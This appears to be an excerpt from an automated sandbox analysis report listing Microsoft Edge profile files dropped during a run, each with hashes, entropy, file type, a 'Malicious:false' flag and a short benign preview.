                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a6219028-0440-44e0-954b-e3f727023a7e.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                    MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                    SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                    SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                    SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e408ac2d-f4d0-4ab4-a639-d971006916cd.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                    MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                    SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                    SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                    SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9817
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116053717911298
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:st5kdpIsJHFsZihUkJBZP8AbV+FSCQA66WSiaFIMYOPKYJ:st5QIsJHFfhvbGrQx6WSiaTYM
                                                                                                                                                                                                                                                                                    MD5:4DE0BDB42BE872098111C0DA367123FB
                                                                                                                                                                                                                                                                                    SHA1:41DC28CF22706F0F448BE2953A92B9D5CB3AB34F
                                                                                                                                                                                                                                                                                    SHA-256:4837A4C833F75DDA62FFF1F786D37E3A51DD932633692D5A5B2E1F990B11BD05
                                                                                                                                                                                                                                                                                    SHA-512:893E21B0BFC0A4C19B6E0DDC1E23309E890F68A85ED3BDCB0630C8AA4E1E93CF2B8DA6CA7FD53FFE70950F3085D77E0D63D7C78C8A1FC8D843E76CCEF4B847B7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF49278.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9817
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116053717911298
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:st5kdpIsJHFsZihUkJBZP8AbV+FSCQA66WSiaFIMYOPKYJ:st5QIsJHFfhvbGrQx6WSiaTYM
                                                                                                                                                                                                                                                                                    MD5:4DE0BDB42BE872098111C0DA367123FB
                                                                                                                                                                                                                                                                                    SHA1:41DC28CF22706F0F448BE2953A92B9D5CB3AB34F
                                                                                                                                                                                                                                                                                    SHA-256:4837A4C833F75DDA62FFF1F786D37E3A51DD932633692D5A5B2E1F990B11BD05
                                                                                                                                                                                                                                                                                    SHA-512:893E21B0BFC0A4C19B6E0DDC1E23309E890F68A85ED3BDCB0630C8AA4E1E93CF2B8DA6CA7FD53FFE70950F3085D77E0D63D7C78C8A1FC8D843E76CCEF4B847B7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4bef7.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9817
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116053717911298
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:st5kdpIsJHFsZihUkJBZP8AbV+FSCQA66WSiaFIMYOPKYJ:st5QIsJHFfhvbGrQx6WSiaTYM
                                                                                                                                                                                                                                                                                    MD5:4DE0BDB42BE872098111C0DA367123FB
                                                                                                                                                                                                                                                                                    SHA1:41DC28CF22706F0F448BE2953A92B9D5CB3AB34F
                                                                                                                                                                                                                                                                                    SHA-256:4837A4C833F75DDA62FFF1F786D37E3A51DD932633692D5A5B2E1F990B11BD05
                                                                                                                                                                                                                                                                                    SHA-512:893E21B0BFC0A4C19B6E0DDC1E23309E890F68A85ED3BDCB0630C8AA4E1E93CF2B8DA6CA7FD53FFE70950F3085D77E0D63D7C78C8A1FC8D843E76CCEF4B847B7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4efcb.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9817
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116053717911298
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:st5kdpIsJHFsZihUkJBZP8AbV+FSCQA66WSiaFIMYOPKYJ:st5QIsJHFfhvbGrQx6WSiaTYM
                                                                                                                                                                                                                                                                                    MD5:4DE0BDB42BE872098111C0DA367123FB
                                                                                                                                                                                                                                                                                    SHA1:41DC28CF22706F0F448BE2953A92B9D5CB3AB34F
                                                                                                                                                                                                                                                                                    SHA-256:4837A4C833F75DDA62FFF1F786D37E3A51DD932633692D5A5B2E1F990B11BD05
                                                                                                                                                                                                                                                                                    SHA-512:893E21B0BFC0A4C19B6E0DDC1E23309E890F68A85ED3BDCB0630C8AA4E1E93CF2B8DA6CA7FD53FFE70950F3085D77E0D63D7C78C8A1FC8D843E76CCEF4B847B7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.567446526186164
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:c64Tl7WPl1fwH8F1+UoAYDCx9Tuqh0VfUC9xbog/OV8JYSLrwHqpVtuu:c64Tl7WPl1fwHu1jadeSAstB
                                                                                                                                                                                                                                                                                    MD5:F669505FCC3009C42D05E9A02BD3ABC6
                                                                                                                                                                                                                                                                                    SHA1:46E91F55009D6AD03AE9CDC1DE4C19B8D1F14DA9
                                                                                                                                                                                                                                                                                    SHA-256:5F47D70862C4CF14B3A66990964568E1AC77E79DB07C68D11F1021B7557CBE83
                                                                                                                                                                                                                                                                                    SHA-512:28748644903D7720E9189DB86E06ACDAEC4FA6FCA08B97F795B47C78D9ADE822BBC4FC32DCA9BCA3F7C42F403993CDD0623253E0E90B398B8B1A80AE488BFDCD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379780831720600","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379780831720600","location":5,"ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF48d38.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.567446526186164
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:c64Tl7WPl1fwH8F1+UoAYDCx9Tuqh0VfUC9xbog/OV8JYSLrwHqpVtuu:c64Tl7WPl1fwHu1jadeSAstB
                                                                                                                                                                                                                                                                                    MD5:F669505FCC3009C42D05E9A02BD3ABC6
                                                                                                                                                                                                                                                                                    SHA1:46E91F55009D6AD03AE9CDC1DE4C19B8D1F14DA9
                                                                                                                                                                                                                                                                                    SHA-256:5F47D70862C4CF14B3A66990964568E1AC77E79DB07C68D11F1021B7557CBE83
                                                                                                                                                                                                                                                                                    SHA-512:28748644903D7720E9189DB86E06ACDAEC4FA6FCA08B97F795B47C78D9ADE822BBC4FC32DCA9BCA3F7C42F403993CDD0623253E0E90B398B8B1A80AE488BFDCD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379780831720600","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379780831720600","location":5,"ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                    MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                    SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                    SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                    SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):299
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.195570155576596
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iJXhq1923oH+TcwtE/a252KLlgpkq2P923oH+TcwtE/a2ZIFUv:iJXBYeb8xLapkv4Yeb8J2FUv
                                                                                                                                                                                                                                                                                    MD5:629EDA51CD7579C735334FE16D917061
                                                                                                                                                                                                                                                                                    SHA1:7CA36F7EA53767EF6469D0D19F1AE19254D0717B
                                                                                                                                                                                                                                                                                    SHA-256:0ADD5CD8651EEAA1163B7ECA5CADFEA7652D41F435FC486A0B44A357EF67B10D
                                                                                                                                                                                                                                                                                    SHA-512:E2A8E357D7017876080B64CBDC08EE0549359E1B5E2408B41D526DC3055D0389CF87D38D4D98F7CD8EC89C7D54626B161A762274F428EB04E2E421A33D7C7AFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:30.395 1b90 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/27-08:47:30.415 1b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):114575
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.579236414546807
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekq4FMW:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dhZ
                                                                                                                                                                                                                                                                                    MD5:463A6FD131A0E4F768F81184C74BF35D
                                                                                                                                                                                                                                                                                    SHA1:C0109555400E5D379DBC5B06DA21E6A1429009A6
                                                                                                                                                                                                                                                                                    SHA-256:08A6643B285351A5F290E2B32A7C9DAEB92B70E86E889B5BB391FCB7B77E01F1
                                                                                                                                                                                                                                                                                    SHA-512:EA61304FD455A0EA4657FBF704CD6DFC6167E265A0199E0022D472AB9EAF0C69D343631F0DB945F451A3C62DA0B75EC4A33B8648FB708794D5CD6AF8FD1B50A0
                                                                                                                                                                                                                                                                                    Malicious:false
